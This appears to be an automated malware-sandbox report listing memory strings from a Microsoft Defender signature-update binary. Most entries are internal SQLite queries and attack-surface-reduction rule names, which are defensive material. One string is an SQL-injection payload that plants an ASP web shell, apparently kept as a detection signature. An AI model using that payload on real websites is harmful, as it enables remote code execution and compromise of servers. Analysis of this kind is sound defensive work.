Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE RecordIdentifier.ID IN (SELECT FileInstance.RecordID from FileInstance WHERE FileInstance.ParentRecordID = ? );
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT RuleAction, RuleId, IsAudit, IsInherited, State FROM BmHipsRuleInfo WHERE ProcessInfoId = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FirewallRuleName, ExpiryTime FROM NetworkIpFirewallRules WHERE ExpiryTime < ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemFileCache;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SdnEx;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(3, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileInstance(InstanceTimeStamp, RecordID, ScanID, TrackingEnabled, StorageEvent, StorageEventState, ModificationsCount, ParentRecordID, Parent_FileEvent, Parent_FileName, Parent_ProcessID, Remote_ProcessID, FileID, FileName, USN, CreateTime, LastAccessTime, LastWriteTime, Signer, SignerHash, Issuer, SigningTime, MOTW, MOTWFromParent,IsValidCert, CertInvalidDetails, IsCatalogSigned) VALUES(?, ? , ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Version, Current, LastUpdated FROM SQLiteGlobals WHERE Current = 1 ORDER BY Version DESC ;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM AmsiFileCache WHERE AmsiFileCache.PersistId = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AttributeCounts(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(28, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID from File WHERE SHA1 = ? ;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ScanInfo(SigSeq, PersistSigSeq, ProgenitorPersistSigSeq, ScanAgent, NamedAttributes, PeAttributes, SigAttrEvents, ScanReason, WebURL, EngineID, SigSha) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM Engine WHERE EngineVersion = ? AND SigVersion = ? ;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AmsiFileCache(PersistId, PersistIdBlob, ExpirationDate) VALUES (?, ?, DateTime('now', ?));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;SELECT Key, CurrentCount FROM SdnEx WHERE Key = ?DELETE FROM SdnEx WHERE SdnEx.Key = ?;SELECT Count(1) FROM SdnEx;INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);DELETE FROM SdnEx;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AttributePersistContext;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemRegistryCache;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(24, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(11, 1, date('now'));
Source: mpam-728dfe11.exe, 00000011.00000003.18599366058.0000027770042000.00000004.00000001.sdmp, MpSigStub.exe, 00000012.00000003.18632031350.000002DF229C1000.00000004.00000001.sdmp Binary or memory string: Select ActionPA6Block executable content from email client and webmail;Block all Office applications from creating child processes:Block Office applications from creating executable contentBBlock Office applications from injecting code into other processesIBlock JavaScript or VBScript from launching downloaded executable content1Block execution of potentially obfuscated scripts'Block Win32 API calls from Office macro`Block executable files from running unless they meet a prevalence, age, or trusted list criteria*Use advanced protection against ransomwareYBlock credential stealing from the Windows local security authority subsystem (lsass.exe)@Block process creations originating from PSExec and WMI commands8Block untrusted and unsigned processes that run from USBJBlock only Office communication applications from creating child processes0Block Adobe Reader from creating child processesPA)Antimalware engine has stopped responding
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT Count(1) FROM DynSigRevisions;DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18225498885.0000021B4EEFC000.00000004.00000001.sdmp Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;Engine.MetaStore.DBVaultUtilizationMpDisableTaskSchedCmdLineScanMb=Lk
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AnomalyTables(Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(16, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(8, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(26, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_ FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AnomalyTables;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileHashes; DELETE FROM FileHashes WHERE FileHashes.Key = ?; DELETE FROM FileHashes WHERE InstanceTimeStamp < ?; INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);SELECT Key FROM FileHashes WHERE FileHashes.Key = ?; SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?; SELECT Key FROM FileHashes ORDER BY InstanceTimeStamp ASC LIMIT 1
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?; SELECT COUNT(1) FROM FileLowFiAsync; DELETE FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; DELETE FROM FileLowFiAsync WHERE InstanceTimeStamp < ?; INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID, PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(20, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE PersistId = ?;
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(18, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AnomalyInfo;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ValueMapArrayBlob FROM ValueMapArray WHERE Key = ? AND RecordType = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributeCounts WHERE AttributeCounts.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT Count(1) FROM DynSigRevisions;SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributeCounts ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM ValueMapArray WHERE ValueMapArray.Key = ? AND ValueMapArray.RecordType = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AtomicCounters; SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1; SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?; DELETE FROM AtomicCounters; DELETE FROM AtomicCounters WHERE ExpireTime < ?; DELETE FROM AtomicCounters WHERE AtomicCounters.Key = ?; SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?; UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(21, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmFileInfo;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AtomicCounters;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(17, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmHipsRuleInfo(ProcessInfoId, RuleAction, RuleId, IsAudit, IsInherited, State) VALUES (?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory;SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;[3
Source: MpSigStub.exe, 0000000B.00000003.18301444780.0000021B5E291000.00000004.00000001.sdmp Binary or memory string: SELECT information FROM tdata where dataname = '%s' and g_name = '%s';
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ProcessInfo(FileName, ProcessId, CommandLine, StartTime, TokenElevation, TokenElevationType, IntegrityLevel) VALUES(? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE ID = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(19, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM NetworkIpFirewallRules WHERE NetworkIpFirewallRules.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(22, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId FROM BmFileStartupActions WHERE FilePathHash = ?DELETE FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT Count(1) FROM BmFileStartupActions;|
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(29, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SystemRegistryCache WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AttributeCounts;
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp Binary or memory string: insertinto[bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;')
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM AmsiFileCache;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SystemRegistryCache(Key, FileIDHash, RegPath, RegOperation, NewRegType, OldRegType, OldRegData, NewRegData, InstanceTimeStamp) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18227480207.0000021B4F0DB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime, UpdateTime) VALUES(? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO File(SHA1, MD5, lshashs, lshash, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n, Size, SHA256) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?, ?, ? );
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
